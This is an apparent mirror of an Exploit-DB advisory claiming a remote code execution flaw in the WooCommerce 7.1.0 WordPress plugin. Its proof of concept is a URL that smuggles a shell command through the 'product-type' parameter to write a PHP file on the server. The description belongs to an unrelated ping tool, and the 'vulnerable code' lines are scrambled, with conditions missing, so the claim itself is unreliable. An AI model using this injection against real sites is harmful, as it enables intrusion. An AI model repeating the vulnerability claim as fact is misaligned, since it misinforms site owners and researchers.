WooCommerce v7.1.0 – Remote Code Execution(RCE)

  • 作者: Milad karimi
    日期: 2023-03-31
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51156/
  • # Title: WordPress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE)
    # Date: 2022-12-07
    # Author: Milad Karimi
    # Vendor Homepage: https://wordpress.org/plugins/woocommerce
    # Software Link: https://wordpress.org/plugins/woocommerce
    # Tested on: windows 10 , firefox
    # Version: 7.1.0
    # CVE : N/A
    
    # Description:
    simple, easy to use jQuery frontend to php backend that pings various
    devices and changes colors from green to red depending on if device is
    up or down.
    
    # PoC :
    
    http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php
    http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php
    
    
    # Vulnerabile code:
    
     95: $classname $classname($post_id); 
      94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple'); 
        92: ⇓ function save($post_id, $post)
           93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type'])); 
              92: ⇓ function save($post_id, $post)